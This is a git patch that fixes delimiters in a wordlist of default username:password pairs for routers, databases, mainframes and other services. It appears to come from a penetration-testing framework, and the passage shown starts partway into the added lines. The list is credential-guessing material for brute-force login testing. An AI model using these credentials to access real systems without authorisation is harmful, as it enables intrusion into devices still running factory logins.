+sedacm +db2admin +Airaya +SYSDUMP1 +IMEDIA +primos_cs +USER_TEMPLATE +pnadmin +lpadmin +VTAM +TRACESVR +POSTMASTER +MAILER +RSCSV2 +QS_WS +circ +nobody +Tasman +DISCOVERER_ADMIN +VMASMON +LR-ISDN +TURBINE +GL +PO +PRINT +MODTEST +GATEWAY +PRIMARY +both +haasadm +pw +games +DOCSIS_APP +bbs +EMP +postmaster +SITEMINDER +vgnadmin +RJE +gonzo +NEWS +AQUSER +UTLBSTATU +netbotz +xmi_demo +ORACACHE +MCUser +prash +sync +PM +AP2SVP +ibm +ULTIMATE +SABRE +user_pricer +SUPERVISOR +EVENT +PORTAL30_SSO_PS +FSFADMIN +OO +WKSYS +OPERATNS +UVPIM_ +OE +OCITEST +web +ESSEX +None +CTXDEMO +user_designer +QDBA +role +LRISDN +tele +WEBCAL01 +rsadmin +OMWB_EMULATION +WINDOWS_PASSTHRU +MOREAU +fast +host +ORDPLUGINS +SYSWRM 
+savelogs +SDOS_ICSAP +DSSYS +MGWUSER +TDOS_ICSAP +ssp +EJSADMIN +INGRES +DS +estheralastruey +VCSRV +ssladmin +CLARK +OEMADM +restoreonly +quser +MILLER +trmcnfg +REPORT +user_author +dpn +tour +mountfsys +http +PROG +openfiler +RAID +STARTER +FAXUSER +DSA +daemon +mountsys +backuponly +IVPM1 +USER3 +OPENSPIRIT +prime +HPLASER +CSPUSER +qsvr +SYSCKP +Sysop +user_marketer +IMAGEUSER +bsxuser +MASTER +USER9 +OLAPSYS +rje +ODM_MTR +QS_ES +lansweeperuser +DEMO3 +Username +GPLD +uucp +DBSNMP +VMARCH +SWUSER +Operator +CHEY_ARCHSVR +roo +n.a +accounting +backuprestore +dni +WEBADM +iceman +guru +anon +USER8 +PORTAL30_SSO_PUBLIC +postgres +WINSABRE +USERP +IVPM2 +PORTAL30_SSO +ALLIN1MAIL +POST +TEMP +BATCH1 +PROMAIL +SECDEMO +ARAdmin +sadmin +ORAREGSYS +VMASSYS +man +FROSTY +LASER +tutor +DISKCNT +default +SYSERR +WWW +VAX +PROCAL +FAXWORKS +LDAP_Anonymous +(any +setup/snmp +DSGATEWAY +AWARD_SW +CSMIG +umountfsys +VMS +bpel +viewuser +TDISK +politically +user_analyst +RSCS +COMPIERE +OSP22 +guest1 +FORSE +factory +bubba +QUSER +primeos +glftpd +RMAN +mountfs +DIRECT +firstsite +IPFSERV +TSUSER +BATCH2 +snmp +WebAdmin +IBMUSER +SMART +voadmin +BC4J +core +OPERVAX +Bobo +WANGTEK +OWA +USER2 +jasperadmin +VMBSYSAD +PVM +ctb_admin +  +DEMO4 +qsrv +superdba +PORTAL30 +XPRT +Crowd +18364 +ilom-admin +rdc123 +sysopr +tasman +blank +WEBREAD +ODM +11111111 +AURORA$ORB$UNAUTHENTICATED +ADAMS +Craft +rfmngr +SYSTEST_CLIG +user_approver +ilom-operator +Nice-admin +answer +NETNONPRIV +nuucp +CIDS +VASTEST +redline +MBMANAGER +webmaster +APPLSYS +USER4 +hqadmin +UOMNI_ +VMUTIL +uucpadm +EXFSYS +4Dgifts +JMUSER +CIS +UNITY_ +HLW +pwrchute +IDMSSE +NSA +TELEDEMO +recover +TRAVEL +lexar +viewer +LIBRARY +PO8 +root@localhost +NAMES +secofr +PDMREMI +MGE +USER7 +OWA_PUBLIC +questra +builtin +SFCNTRL +boss +PLEX +OLAPDBA +OLAPSVR +user_expert +Bhosda +gropher +TAHITI +NEWINGRES +VM3812 +VIF_DEVELOPER +joeuser +IPC +HELPDESK +wlpisystem +TSAFVM +prtgadmin +UAMIS_ +theman +CISINFO +mobile 
+QS_CB +CDEMORID +DEMO2 +PORTAL30_PUBLIC +MDDEMO_CLERK +PHANTOM +ODS +BLAKE +TSDEV +PRODBM +dos +APL2PP +god1 +CICSUSER +22222222 +user_publisher +OSE$HTTP$ADMIN +def +SuperUser +QS_CBADM +SYSA +STUDENT +Draytek +SMDR +EREP +VSEMAN +fwadmin +MTS_USER +AQDEMO +private +IS_$hostname +HPSupport +ORASSO +CVIEW +SH +XXSESS_MGRYY +VMMAP +PORTAL30_DEMO +Ezsetup +QS_CS +CMSUSER +DEMO1 +userNotUsed +ncadmin +TESTPILOT +fg_sysadmin +UETP +QS +DBI +JWARD +APPS_MRC +Moe +SENTINEL +Yak +PDP11 +Flo +SLIDE +INFO +checkfsys +PRODCICS +MXAGENT +VMTLIBR +POWERCARTUSER +VMBACKUP +CPNUC +distrib +MIGRATE +CDEMOUCB +OLTSEP +sysbin +signa +autocad +WEBDB +ncrm +SAMPLE +HCPARK +ALLINONE +nm2user +SAVSYS +IIPS +PATROL +mailadmin +TMSADM +ESubscriber +software +god2 +FSFTASK2 +ORDSYS +gopher +PSFMAINT +EAdmin +12345 +DECNET +OPERATIONS +$system +PANAMA +LIBRARIAN +fal +NETSERVER +POWERCHUTE +USER5 +GPFD +QS_OS +REPADMIN +0 +DEMO8 +DEMO9 +CDEMO82 +umountsys +USER0 +CDEMOCOR +SYSTEST +Rodopi +user_checker +qserv +AQ +SAPR3 +VRR1 +fastwire +admi +FINANCE +WinCCAdmin +ESTOREUSER +VIRUSER +LINK +APPLSYSPUB +overseer +checksys +umountfs +DBDCCICS +TOAD +ntpupdate +MDDEMO_MGR +billy-bob +DECMAIL +alien +nsroot +AdvWebadmin +dvstation +SERVICECONSUMER1 +MMO2 +NOC +WWWUSER +SAP +NEVIEW +ODSCOMMON +pixadmin +ripeop +PENG +netlink +L2LDEMO +OUTLN +12.x +scott +dbase +fam +Oper +RMAIL +FND +PRIV +SETUP +news +VSEIPO +ilon +PLSQL +politcally +18140815 +APPUSER +CENTRA +LBACSYS +PDP8 +SFCMI +lpadm +Test +bewan +DIP +mfd +MDDEMO +SWPRO +DES +Coco +GCS +rodopi +Scott +Admin5 +ANDY +DESQUETOP +NETCON +JONES +author +MOESERV +PUBSUB1 +CATALOG +SQLUSER +RE +REPORTS_USER +MFG +HR +VIDEOUSER +DBA +AUTOLOG1 +AURORA$JIS$UTILITY$ +wlcsystem +CPRM From d7bf66973c86910730b88b9a02591bec62e69a49 Mon Sep 17 00:00:00 2001 
From: Tonimir Kisasondi <kisasondi@gmail.com>
Date: Sun, 18 May 2014 18:13:03 +0200
Subject: [PATCH 334/853] Fixed userpass delimiters.
---
.../default_userpass_for_services_unhash.txt | 3574 ++++++++---------
1 file changed, 1787 insertions(+), 1787 deletions(-)
diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt
index 8610e57e07..ff0458f94b 100644
--- a/data/wordlists/default_userpass_for_services_unhash.txt
+++ b/data/wordlists/default_userpass_for_services_unhash.txt
@@ -1,1787 +1,1787 @@ -admin:admin -: -admin: -:admin -admin:password -admin:1234 -root: -Administrator:admin -admin:epicrouter -sysadm:sysadm -:1234 -:password -:access -root:root -tech:tech -:smcadmin -:0 -Administrator: -root:pass -:system -root:admin -:PASSWORD -:Symbol -operator: -guest:guest -admin:bintec -security:security -guest: -debug:synnet -manager:manager -:adtran -admin:motorola -service:smile -:cascade -admin:0 -!root: -user:password -:BRIDGE -netman:netman -super:super -admin:switch -admin:setup -admin:changeme -diag:switch -operator:operator -user:user -user: -Cisco:Cisco -Manager:Manager -DTA:TJM -apc:apc -tech: -:cisco -User: -root:1234 -Admin: -:letmein -cablecom:router -adm: -wradmin:trancell -:ascend -manager:friend -:NetICs -root:blender -netscreen:netscreen -:sysadm -:SKY_FOX -sa: -:public -:Master -setup:setup -root:default -:laflaf -cmaker:cmaker -enable: -MICRO:RSX -login:admin -:Posterie -write:private -root:attack -monitor:monitor -:private -:xdfk9874t3 -netopia:netopia -:Col2ogro2 -admin:microbusiness -op:op -adminview:OCS -op:operator -admin:secure -admin:atlantis -sysadmin:sysadmin -super:5777364 -echo:echo -craft: -adm:cascade -admin:default -maint:maint -comcast:1234 -CSG:SESAME -diag:danger -readonly:lucenttech2 -admin:operator -Manager: -debug:d.e.b.u.g -admin:hello -:SYSTEM -root:ascend -root:calvin -manuf:xxyyzz -cusadmin:highspeed -admin:123 -smc:smcadmin -admin:Sharp -root:password -sweex:mysweex -disttech:4tas -su:super -admin:system -root:changeme -poll:tech -sysadmin:password -SYSDBA:masterkey -anonymous: -:0000 -root:permit -admin:barricade -support:support -root:tslinux -admin:hp.com -recovery:recovery -USERID:PASSW0RD -eng:engineer -administrator:administrator -admin:pwp -admin:isee -NETWORK:NETWORK -JDE:JDE -admin:superuser -Guest: -:Super -admin:admin123 -super:surt -rwa:rwa -admin:123456 -admin:NetCache -:ADTRAN -USER:USER -test:test -admin:extendnet -admin:ironport -lp:lp -:Cisco -administrator: -admin:1111 
-sysadmin:PASS -ro:ro -admin:Ascend -:_Cisco -MAIL:MAIL -ami: -:sitecom -hsa:hsadb -system:password -MGR:CAROLIAN -ADMINISTRATOR:ADMINISTRATOR -admin:sysAdmin -root:tini -admin:smcadmin -:Helpdesk -FIELD:SERVICE -PBX:PBX -netman: -HELLO:FIELD.SUPPORT -system:sys -hscroot:abc123 -1502:1502 -:star -superuser:admin -HELLO:MGR.SYS -sysadm:anicust -Administrator:Administrator -netrangr:attack -:Intel -:12345 -readwrite:lucenttech1 -:secret -piranha:piranha -wlse:wlsedb -admin:cisco -l3:l3 -admin:diamond -none:admin -naadmin:naadmin -public:public -admin:1988 -admin:radius -admin:root -NETOP: -Administrator:letmein -HELLO:MANAGER.SYS -:raidzone -:3ascotel -MANAGER:HPOFFICE -demo:demo -:166816 -User:Password -admin:zoomadsl -D-Link:D-Link -user:public -user:pass -l2:l2 -MGR:CCC -rw:rw -cgadmin:cgadmin -storwatch:specialist -:secure -vcr:NetVCR -OPERATOR:COGNOS -piranha:q -admin:synnet -MDaemon:MServer -root:cms500 -root:davox -jagadmin: -enquiry:enquirypw -at4400:at4400 -support:h179350 -davox:davox -admin:asd -PFCUser:240653C9467E45 -setup:changeme -superuser:superuser -:atc123 -aaa: -root:admin_1 -:266344 -MGR:WORD -topicalt:password -admin2:changeme -1234:1234 -MANAGER:ITF3000 -:connect -FIELD:HPONLY -nms:nmspw -client:client -admin:comcomcom -:speedxess -MGR:ROBELLE -:epicrouter -sys:uplink -OPERATOR:SYSTEM -field:support -MGR:SYS -root:letacla -:FORCE: -deskman:changeme -MAIL:REMOTE -SYSADM:sysadm -superadmin:secret -:backdoor -pmd: -MGR:CNAS -admin:22222 -GEN2:gen2 -:medion -ADMN:admn -Factory:56789 -PRODDTA:PRODDTA -tellabs:tellabs#1 -spcl:0 -dadmin:dadmin01 -:comcomcom -administrator:password -helpdesk:OCS -dhs3mt:dhs3mt -MGR:SECURITY -setup:changeme! 
-install:llatsni -adfexc:adfexc -IntraSwitch:Asante -manage:!manage -superman:21241036 -MANAGER:TELESUP -craft:crftpw -login:0 -:help -MGR:HPOFFICE -:lantronix -SPOOLMAN:HPOFFICE -manager:admin -:netadmin -ADVMAIL:HP -FIELD:SUPPORT -MANAGER:SYS -MGR:VESOFT -vt100:public -PSEAdmin:$secure$ -HELLO:OP.OPERATOR -Manager:friend -:hs7mwxkk -patrol:patrol -:SUPER -:SMDR -:1064 -teacher:password -PCUSER:SYS -MGR:ITF3000 -Any:12345 -OPERATOR:DISC -RSBCMON:SYS -cellit:cellit -MGR:INTX3 -inads:inads -halt:tlah -root:wyse -locate:locatepw -admin:visual -TMAR#HWMT8007079: -rapport:r@p8p0r+ -MGR:TELESUP -xbox:xbox -:TENmanUFactOryPOWER -device:device -NICONEX:NICONEX -admin:admin1234 -root:fivranne -acc:acc -31994:31994 -admin:netadmin -bcim:bcimpw -websecadm:changeme -blue:bluepw -topicnorm:password -supervisor:PlsChgMe -:R1QTPS -MGR:HPONLY -ccrusr:ccrusr -root:Cisco -login:password -266344:266344 -MAIL:MPE -telecom:telecom -MAIL:HPOFFICE -GEN1:gen1 -Administrator:smcadmin -SSA:SSA -:snmp-Trap -HTTP:HTTP -:default -mtch:mtch -admin:adslolitec -Administrator:ganteng -bciim:bciimpw -browse:browsepw -Admin:Admin -:Password -hydrasna: -sys:change_on_install -deskres:password -bbsd-client:changeme2 -anonymous:Exabyte -admin:rmnetlm -replicator:replicator -intel:intel -OPERATOR:SUPPORT -MGR:HPP196 -radware:radware -intermec:intermec -mlusr:mlusr -MGR:RJE -FIELD:LOTUS -init:initpw -e250:e250changeme -MAIL:TELESUP -Polycom:SpIp -temp1:password -:adminttd -tech:field -support:supportpw -mac: -:MiniAP -MANAGER:SECURITY -3comcso:RIP000 -RMUser1:password -WP:HPOFFICE -Administrator:changeme -MGR:XLSERVER -MGR:HPP187 -MGR:HPP189 -inads:indspw -admin:linga -craft:craft -:enter -NAU:NAU -rcust:rcustpw -admin:AitbISP4eCiG -mtcl:mtcl -MGR:CONV -topicres:password -bcnas:bcnaspw -MGR:NETBASE -admin:access -public: -adminuser:OCS -MGR:REGO -Root: -cac_admin:cacadmin -mediator:mediator -superman:talent -Anonymous: -kermit:kermit -admin:x-admin -MGR:HPDESK -:9999 -root:ROOT500 -admin:my_DEMARC 
-volition:volition -GlobalAdmin:GlobalAdmin -:4getme2 -LUCENT01:UI-PSWD-01 -admin:2222 -LUCENT02:UI-PSWD-02 -MANAGER:TCH -adminstat:OCS -desknorm:password -IntraStack:Asante -OPERATOR:SYS -MGR:COGNOS -:Fireport -:ILMI -maint:maintpw -supervisor:supervisor -e500:e500changeme -admin:mu -MANAGER:COGNOS -deskalt:password -admin:OCS -bbsd-client:NULL -cust:custpw -admin:noway -tiara:tiaranet -bcms:bcmspw -:TANDBERG -m1122:m1122 -telco:telco -superuser: -xd:xd -dhs3pms:dhs3pms -VNC:winterm -craft:craftpw -maint:rwmaint -anonymous:any@ -login:access -browse:looker -customer:none -cisco:cisco -adminstrator:changeme -FIELD:MANAGER -:1234admin -FIELD:MGR -ftp_nmc:tuxalize -me: -iclock:timely -echo:User -ADVMAIL:HPOFFICE:DATA -login:1111 -login:8429 -Administrator:manage -:Babylon -admin:hagpolm1 -root:12345 -scmadmin:scmchangeme -user:tivonpw -sysadm:Admin -Administrator:password -admin:administrator -installer:installer -webadmin:webadmin -ftp_inst:pbxk1064 -DDIC:19920706 -:pento -admin:NetSurvibox -SYSTEM:D_SYSTPW -draytek:1234 -:3477 -operator:$chwarzepumpe -administrator:asecret -EARLYWATCH:SUPPORT -:10023 -Manager:Admin -super.super: -ftp_oper:help1954 -corecess:corecess -superuser:123456 -admin:Password -super.super:master -admin:Protector -SYSTEM:MANAGER -webadmin:1234 -install:secret -FIELD:HPWORD:PUB -admin:12345 -admin:symbol -weblogic:weblogic -Admin:1988 -system/manager:sys/change_on_install -root:3ep5w2u -:8111 -:jannie -End:User:123 -none:0 -d.e.b.u.g:User -admin:tomcat -target:password -Administrator:pilou -MD110:help -Administrator:3ware -:ANYCOM -tiger:tiger123 -adminttd:adminttd -admin:asante -admin:smallbusiness -admin:netscreen -FIELD:HPP187:SYS -guest:User -maint:ntacdmax -admin:w2402 -wlseuser:wlsepassword -SAPCPIC:admin -ftp_admi:kilo1987 -admin:articon -mtcl: -default.password: -admin:michelangelo -manager:changeme -root:Mau'dib -:Serial:Num -root:ggdaseuaimhrke -7:maintain -2:syslib -ADMIN:admin -system:weblogic -Administrator:ggdaseuaimhrke -ADMIN: 
-itsadmin:init -PUBSUB:PUBSUB -admin:demo -system:manager -sys:sys -CTXSYS:CTXSYS -ftp: -bill:bill -192.168.1.1:60020:@dsl_xilno -FIELD: -admin:dmr99 -setpriv:system -GUEST:GUEST -SAP*:06071992 -operator:1234 -t3admin:Trintech -hello:hello -supervisor: -CISCO15:otbu+1 -1.79:Multi -:babbit -mso:w0rkplac3rul3s -Telecom:Telecom -qsysopr:qsysopr -admin:TANDBERG -admin:imss7.0 -:nokia -APPS:APPS -Developer:isdev -mail:mail -admin:draadloos -qsecofr:qsecofr -11111:x-admin -:default.password -Service:5678 -enable:cisco -netadmin:nimdaten -Polycom:456 -admin:P@55w0rd! -admin:1234admin -root:par0t -any:system -db2fenc1:db2fenc1 -johnson:control -2:maintain -isp:isp -demos: -QSRV:QSRV -root:iDirect -MDSYS:MDSYS -Admin:123456 -2:manager -vpasp:vpasp -TEST:TEST -:Telecom -QSECOFR:QSECOFR -adm:none -:2501 -1:syslib -system:security -admin:leviton -!root:blank -informix:informix -root:mpegvideo -5:games -root:0P3N -engmode:hawk201 -scout:scout -qpgmr:qpgmr -admin:admin000 -ADSL:expert03 -cisco: -images:images -admin:security -admin:surecom -Gearguy:Geardog -:symantec -comcast: -admin:adslroot -1:manager -Demo: -:xyzzy -Administrator:adaptec -system:system -SAP*:PASS -serial#:serial# -BACKUP:BACKUP -stratacom:stratauser -root:rootme -6.x: -root:!root -webadmin:webibm -:riverhead -mary:password -COMPANY:COMPANY -SYS:SYS -DSL:DSL -Jetform: -none:amber -eagle:eagle -ROUTER: -root:brightmail -admin:pass -:HEWITT:RAND -ods:ods -siteadmin:toplayer -admin:OkiLAN -root:rootpass -Alphanetworks:wrgg15_di524 -:x40rocks -:nokai -Admin1:Admin1 -field:field -Admin:admin -Admin:ImageFolio -:iolan -:manager -admin:pfsense -janta:sales:janta211 -servlet:manager -username:password -citel:password -Replicator:iscopy -SYSMAN:OEM_TEMP -1:operator -SYSTEM:SYSTEM -administrator:RSAAppliance -master:themaster01 -Admin:1234 -2:operator -SUPERUSER:ANS#150 -admin:passwort -cn=orcladmin:welcome -30:games -maintainer:admin -setup: -:hello -admin:NetSeq -BRIO_ADMIN:BRIO_ADMIN -:citel -internal:oracle 
-CQSCHEMAUSER:PASSWORD -root:kn1TG7psLu -SYS:SYSPASS -:lkwpeter -DEV2000_DEMOS:DEV2000_DEMOS -FSFTASK1: -checkfs:checkfs -BACKUP: -USER1:USER1 -root:TENmanUFactOryPOWER -SQLDBA: -root:resumix -HELP:HELP -toor:logapp -SYS:0RACLE9 -SYS:0RACLE8 -:57gbzb -!root:none -qsrvbas:qsrvbas -SYSADMIN: -EZsetup: -Administrator:1234 -:sldkj754 -BATCH: -STRAT_USER:STRAT_PASSWD -Administrator:19750407 -:User -user:USERP -primenet:primeos -OEMREP:OEMREP -admin:[^_^] -USER6:USER6 -lynx: -:TTPTHA -powerdown:powerdown -root:Mau’dib -SYSTEM:ORACL3 -$ALOC$: -password: -VOL-0215: -admin:nimda -tomcat:tomcat -REP_MANAGER:DEMO -WinCCConnect:2WSXcder -ALLIN1:ALLIN1 -DIRMAINT: -eqadmin::Serial:port:only:equalizer -sysadm:sysadmpw -QSRVBAS:QSRVBAS -admin:ip305Beheer -debug:tech -:ACCORD -AQJAVA:AQJAVA -LASERWRITER:LASERWRITER -Administrator:0000 -root:nsi -PERFSTAT:PERFSTAT -apcuser:apc -MBWATCH:MBWATCH -:protection -system_admin: -unix:unix -OWNER:OWNER -NETPRIV:NETPRIV -VSEMAINT: -:AWARD?SW -DEMO:DEMO -tomcat:changethis -SYMPA:SYMPA -REP_OWNER:REP_OWNER -DCL:DCL -FAX: -root:dbps -ARCHIVIST:ARCHIVIST -USER:PASSWORD -VTAMUSER: -LASERWRITER: -VMTAPE: -basisk:basisk -NetLinx:password -OutOfBox:demos:guest:4DGifts:(none:by:default) -none:letmein -NETMGR:NETMGR -DEFAULT:USER -OAS_PUBLIC:OAS_PUBLIC -read: -AP:AP -demos:demos -SYSTEM:Admin -admin:j5Brn9 -MTSSYS:MTSSYS -SYSMAINT:DIGITAL -AUDIOUSER:AUDIOUSER -Joe:hello -IDMS: -:teX1 -admin:allot -$SRV:$SRV -snake: -SYS:0RACLE -ADVMAIL: -Administrator:nicecti -ROOT:ROOT -PRINTER:PRINTER -shutdown: -satan: -:m1link -RDM470: -master:access -:l2 -:l1 -trouble:trouble -fax: -OP1: -admin@example.com:admin -root:trendimsa1.0 -HOST:HOST -ADLDEMO:ADLDEMO -QS_ADM:QS_ADM -bin:sys -:AMI -OPER:OPER -oracle: -jj: -PO7:PO7 -SYSTEM:0RACLE8 -SYSTEM:0RACLE9 -www: -joe:password -:komprie -:123 -MAINT:MAINT -CMSBATCH: -root:toor -CCC: -role1:tomcat -DATAMOVE: -lp: -:AMISETUP -:sp99dd -halt:halt -MSHOME:MSHOME -ISPVM: -crowd­-openid-­server:password -user_editor:demo 
-sedacm:secacm -ROOT: -Admin:3Com -db2admin:db2admin -Airaya:Airaya -supervisor:visor -none:Wireless -SYSDUMP1: -IMEDIA:IMEDIA -:Biostar -install:install -primos_cs:primos -admin:infrant1 -Administrator:Partner -:Administrative -USER_TEMPLATE:USER_TEMPLATE -pnadmin:pnadmin -:h6BB -lpadmin:lpadmin -guest:none -VTAM:VTAM -TRACESVR:TRACE -POSTMASTER:POSTMASTER -MAILER:MAILER -RSCSV2: -QS_WS:QS_WS -:sma -system_admin:system_admin -circ: -Demo:password -:rwa -nobody:nobody -Tasman:Tasmannet -admin:!admin -DISCOVERER_ADMIN:DISCOVERER_ADMIN -VMASMON: -LR-ISDN:LR-ISDN -TURBINE:TURBINE -GL:GL -PO:PO -:AMI_SW -super:superpass -PRINT: -MODTEST:YES -GATEWAY:GATEWAY -root:system -PRIMARY:PRIMARY -both:tomcat -:award.sw -haasadm:lucy99 -pw:pwpw -games:games -DOCSIS_APP:3Com -bbs: -EMP:EMP -Admin:cclfb -postmaster: -SITEMINDER:SITEMINDER -Any:Any -vgnadmin:vgnadmin -RJE:RJE -gonzo: -NEWS:NEWS -sa:Ektron -:Award -AQUSER:AQUSER -UTLBSTATU:UTLESTAT -:AMIAMI -netbotz:netbotz -CTXSYS:CHANGE_ON_INSTALL -xmi_demo:sap123 -:Crystal -:Daewuu -ftp:ftp -ORACACHE:(random:password) -MCUser:MCUser1 -prash:hello -sync: -sysadm:admpw -root:rootadmin -PM:PM -AP2SVP: -master:master -ibm:2222 -ULTIMATE:ULTIMATE -SABRE: -role1:role1 -user_pricer:demo -admin:enhydra -SUPERVISOR:NF -EVENT:EVENT -:xyzall -:rainbow -ADMIN:JETSPEED -SYS:ORACL3 -PORTAL30_SSO_PS:PORTAL30_SSO_PS -FSFADMIN: -OO:OO -WKSYS:WKSYS -OPERATNS:OPERATNS -:ksdjfg934t -UVPIM_: -:merlin -OE:OE -Any:Local:User:Local:User:password -OCITEST:OCITEST -web: -:HLT -ADMINISTRATOR:admin -ESSEX: -:last -CTXSYS: -None:xyzzy -CTXDEMO:CTXDEMO -user_designer:demo -:Admin -:zebra -QDBA:QDBA -role:changethis -LRISDN:LRISDN -tele:tele -WEBCAL01:WEBCAL01 -rsadmin:rsadmin -OMWB_EMULATION:ORACLE -root:alien -WINDOWS_PASSTHRU: -:sanfran -public:ReadOnly:access:secret -:AMIPSWD -MOREAU:MOREAU -fast:abd234 -root:QNX -host:dnnhost -administrator:root -admin:public -SYSTEM:ORACLE -:sertafu -ORDPLUGINS:ORDPLUGINS -SYSWRM: -mail: -:telos -ADMIN:ADMIN 
-administrator:adminpass -savelogs:crash -:ACCESS -SDOS_ICSAP:SDOS_ICSAP -system:adminpwd -BATCH:BATCH -GUEST:GUESTGUEST -SYSMAINT:SYSMAINT -postmaster:postmast -DSSYS:DSSYS -:award_ps -:ZAAADA -MGWUSER:MGWUSER -:NTCIP -OPERATOR: -:hewlpack -TDOS_ICSAP:TDOS_ICSAP -ssp:ssp -EJSADMIN:EJSADMIN -:damin -INGRES:INGRES -DS: -:A.M.I -estheralastruey: -:1322222 -VCSRV:VCSRV -Administrator:storageserver -ssladmin:ssladmin -CLARK:CLOTH -shutdown:shutdown -administrator:1234 -OEMADM:OEMADM -restoreonly:restoreonly1 -quser:quser -PRINTER: -MILLER:MILLER -trmcnfg:trmcnfg -REPORT:REPORT -user_author:demo -:aLLy -dpn:changeme -tour:tour -mountfsys:mountfsys -http: -PROG:PROG -:iwill -openfiler:password -:Public -admin:mp3mystic -RAID:hpt -read:synnet -admin:peribit -STARTER:STARTER -FAXUSER: -GUEST:GUESTGUE -DSA: -:guardone -daemon:daemon -mountsys:mountsys -SYSTEM:ORACLE9 -SYSTEM:ORACLE8 -:gandalf -backuponly:backuponly1 -IVPM1: -:leaves -sysadm:syspw -root:blablabla -:Compleri -USER3:USER3 -OPENSPIRIT:OPENSPIRIT -:spooml -:changeit -:wg -prime:primeos -HPLASER: -:Vextrex -CSPUSER: -qsvr:qsvr -lynx:lynx -SYSCKP: -root:letmein -Sysop:Sysop -user_marketer:demo -IMAGEUSER:IMAGEUSER -root:Password -bsxuser:bsxpass -MASTER:PASSWORD -USER9:USER9 -root:ax400 -OLAPSYS:MANAGER -SYSTEM:OPERATOR -oracle:oracle -root:Mau?dib -:MASTER -root:t00lk1t -rsadmin: -:Daytec -OutOfBox: -:SZYX -:cmaker -:CTX_123 -rje:rje -ODM_MTR:MTRPW -QS_ES:QS_ES -lansweeperuser:mysecretpassword0* -DEMO3: -Username:password -GPLD:GPLD -uucp:uucp -DBSNMP:DBSNMP -VMARCH: -GUEST:TSEUG -SWUSER:SWUSER -root:8RttoTriz -VTAM: -OPERATNS: -Operator:Operator -CHEY_ARCHSVR: -SYS:ORACLE -roo:honey -n.a:guardone -accounting:accounting -backuprestore:backuprestore1 -PRINT:PRINT -:j322 -:Craftr4 -dni:dni -WEBADM:password -iceman: -guru:*3noguru -FAX:FAX -anon:anon -:j256 -USER8:USER8 -root:honey -PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC -:589721 -postgres: -WINSABRE:WINSABRE -USERP:USERP -none:public -Admin:shs -SYS:MANAGER 
-IVPM2: -PORTAL30_SSO:PORTAL30_SSO -ALLIN1MAIL:ALLIN1MAIL -POST: -TEMP: -:xo11nE -admin:nms -SYSADM:SYSADM -BATCH1: -me:me -SUPERVISOR:NFI -PROMAIL: -SECDEMO:SECDEMO -ARAdmin:AR#Admin# -sadmin: -ORAREGSYS:ORAREGSYS -VMASSYS: -man: -FROSTY:SNOWMAN -LASER:LASER -tutor: -:?award -root:changethis -DISKCNT: -default:WLAN_AP -SYSERR: -WWW:WWW -VAX:VAX -none:none -:Cable-docsis -PROCAL: -SUPERVISOR:SYSTEM -FAXWORKS: -ibm:password -CTXSYS:UNKNOWN -LDAP_Anonymous:LdapPassword_1 -(any:3:chars):cascade -games: -User:1234 -:Zenith -setup/snmp:setup/nopasswd -DSGATEWAY:DSGATEWAY -AWARD_SW: -CSMIG:CSMIG -:year2000 -umountfsys:umountfsys -:BIGO -root:jstwo -VMS:VMS -dni: -bpel:bpel -viewuser:viewuser1 -admin:ISPMODE -TDISK: -politically:correct -user_analyst:demo -admin:conexant -guest:1234 -root:logapp -admin:ip3000 -RSCS: -COMPIERE:COMPIERE -OSP22:OSP22 -guest1:guest1 -FORSE:FORSE -:lesarotl -factory:factory -bubba:(unknown) -admin:ip20 -admin:ip21 -LASER: -QUSER:QUSER -:AWARD:SW -primeos:prime -admin:tr650 -poll:poll -:j262 -:xljlbj -glftpd:glftpd -:Advance -RMAN:RMAN -mountfs:mountfs -DIRECT: -:console -firstsite:firstsite -:SW_AWARD -IPFSERV: -:snake -Administrator:Gateway -TSUSER:TSUSER -BATCH2: -admin:123123 -:3098z -:cc -snmp:nopasswd -WebAdmin:WebBoard -IBMUSER:SYS1 -SMART: -voadmin:manager -BC4J:BC4J -core:phpreactor -OPERVAX:OPERVAX -Bobo:hello -:Congress -:central -WANGTEK:WANGTEK -disttech:etas -OWA:OWA -USER2:USER2 -jasperadmin:jasperadmin -FIELD:DIGITAL -root:uClinux -guest:guestgue -FAXUSER:FAXUSER -WINSABRE:SABRE -VMBSYSAD: -admin:ip400 -PVM: -ctb_admin:sap123 -:AMI.KEY -:AMI.KEZ - :ANYCOM -USER_TEMPLATE: -DEMO4: -:inuvik49 -QSRV:11111111 -qsrv:qsrv -superdba:admin -PORTAL30:PORTAL31 -PORTAL30:PORTAL30 -XPRT:XPRT -Crowd:password -User:19750407 -18364: -:zjaaadc -ilom-admin:ilom-admin -rdc123:rdc123 -sysopr:sysopr -tasman:tasmannet -SYSTEM:0RACLE8I -:Cisco:router -admin:store -:SER -blank:blank -ADMIN:PASSWORD -admin:IP:address -WEBREAD:WEBREAD -ODM:ODM 
-11111111:11111111 -prime:prime -AURORA$ORB$UNAUTHENTICATED:INVALID -ADAMS:WOOD -root:vertex25 -sys:bin -lp:lineprin -Craft:crftpw -www:www -postgres:dbpass -rfmngr:$rfmngr$ -sync:sync -WANGTEK: -:1988 -MAINT: -SYSTEST_CLIG:SYSTEST -user:user0000 -user_approver:demo -ilom-operator:ilom-operator -Nice-admin:nicecti -:HELGA-S -answer: -NETNONPRIV:NETNONPRIV -nuucp: -CIDS:CIDS -VASTEST: -primenet:primenet -redline:redline -:rw -spcl:0000 -admin:muze -MBMANAGER:MBMANAGER -webmaster: -APPLSYS:FND -:ro -WINDOWS_PASSTHRU:WINDOWS_PASSTHRU -USER4:USER4 -hqadmin:hqadmin -UOMNI_: -FIELD:TEST -sys:system -Admin:123qwe -VMUTIL: -POST:BASE -:dn_04rjc -uucpadm:uucpadm -halt: -FAXWORKS:FAXWORKS -admin:password1 -EXFSYS:EXFSYS -4Dgifts: -JMUSER:JMUSER -admin:imsa7.0 -SUPERVISOR:NETFRAME -CIS:CIS -UNITY_: -:ciscofw -HLW:HLW -admin:brocade1 -pwrchute:pwrchute -:setup -:Tiny -IDMSSE: -postgres:svcPASS83 -NSA:nsa -!root:!ishtar -admin:blank -root:NeXT -TELEDEMO:TELEDEMO -:AMIDECOD -recover:recover -TRAVEL:TRAVEL -lexar: -:efmukl -viewer: -LIBRARY: -admin:raritan -PO8:PO8 -root@localhost:root -NAMES:NAMES -secofr:secofr -PDMREMI: -:biostar -MGE:VESOFT -USER7:USER7 -OWA_PUBLIC:OWA_PUBLIC -questra:questra -builtin:builtin -SFCNTRL: -SAP*:6071992 -boss:boss -anonymous:password 